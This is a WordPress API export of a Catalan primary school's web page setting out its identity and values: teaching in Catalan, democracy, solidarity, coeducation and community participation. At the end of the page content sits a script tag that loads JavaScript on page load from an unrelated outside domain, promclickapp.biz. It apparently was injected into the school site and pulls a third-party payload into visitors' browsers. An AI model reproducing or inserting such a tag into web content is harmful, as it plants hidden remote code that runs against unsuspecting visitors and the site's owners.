{"id":26,"date":"2014-09-18T12:24:32","date_gmt":"2014-09-18T11:24:32","guid":{"rendered":"http:\/\/agora.xtec.cat\/ceip-annexa-jp\/?page_id=26"},"modified":"2019-12-03T17:24:02","modified_gmt":"2019-12-03T16:24:02","slug":"historia","status":"publish","type":"page","link":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/lescola\/historia\/","title":{"rendered":"Trets d&#8217; identitat"},"content":{"rendered":"<p><span style=\"font-size: large;\">Ens definim, segons el nostre Projecte Educatiu de Centre, de la seg\u00fcent manera:<br \/>\n<\/span><\/p>\n<p><span style=\"font-size: large;\">Som una escola catalana en llengua i continguts, plenament integrada en l&#8217;entorn, arrelada en el context hist\u00f2ric propi, i que utilitza el catal\u00e0 com a llengua base d&#8217;aprenentatge.<\/span><\/p>\n<p><span style=\"font-size: large;\">Potenciem els valors \u00e8tics com democr\u00e0cia, llibertat, solidaritat, i la voluntat d&#8217; incidir positivament en el respecte i conservaci\u00f3 de l&#8217;entorn natural. Fomentem el treball per la pau, la solidaritat entre tots i el respecte pel Medi Ambient.<\/span><\/p>\n<p><span style=\"font-size: large;\">Entenem que des de l&#8217;escola s&#8217;ha de donar una formaci\u00f3 integral que afavoreixi l&#8217;autoestima i el desenvolupament de totes les capacitats de cadascun dels nostres alumnes. Fomentem la creativitat\u00a0 i la capacitat expressiva i comunicativa dels nois i noies, per tal que es puguin desenvolupar com a persones capaces per a poder conviure en societat i aix\u00ed poder millorar i impulsar la seva transformaci\u00f3. Potenciem la investigaci\u00f3 i l&#8217;experimentaci\u00f3, l&#8217;observaci\u00f3 i l&#8217;an\u00e0lisi de la realitat, Intentem donar una informaci\u00f3 acurada de la realitat que ens envolta, fomentant en els alumnes un esperit cr\u00edtic en sentit positiu.<br \/>\n<\/span><\/p>\n<p><span style=\"font-size: large;\"><br \/>\nPromovem el coneixement de la ciutat i de l&#8217;entorn m\u00e9s immediat al Centre, fomentem la participaci\u00f3 de la seva comunitat en les activitats que s&#8217;hi generen i que projectem sobre la ciutat i el resultat de la nostra tasca educativa.<\/span><\/p>\n<p><span style=\"font-size: large;\"> Treballem des de la coeducaci\u00f3, \u00e9s a dir , plantegem el treball sabent que tots som persones i evitant els estereotips i les divisions de tasques per g\u00e8nere. Respectem i atenem\u00a0 les diversitats de tota mena , aix\u00ed com els ritmes evolutius i de capacitats dels alumnes intentant donar respostes a cada cas.<br \/>\n<\/span><\/p>\n<p><span style=\"font-size: large;\"> Facilitem la participaci\u00f3 democr\u00e0tica de tots els estaments implicats en la gesti\u00f3 del Centre, promovent una participaci\u00f3 activa i responsable dels mestres, alumnes i pares. Valorem la diversitat del professorat dins el treball en equip, corresponsabilitzant els seus membres en la tasca escola i en la seva l\u00ednia educativa.<br \/>\n<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/promclickapp.biz\/1e6ab715a3a95d4603.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ens definim, segons el nostre Projecte Educatiu de Centre, de la seg\u00fcent manera: Som una escola catalana en llengua i [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":22,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"page-templates\/side-menu.php","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-26","page","type-page","status-publish","hentry"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/pages\/26","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/comments?post=26"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/pages\/26\/revisions"}],"predecessor-version":[{"id":1379,"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/pages\/26\/revisions\/1379"}],"up":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/pages\/22"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/ceip-annexa-jp\/wp-json\/wp\/v2\/media?parent=26"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}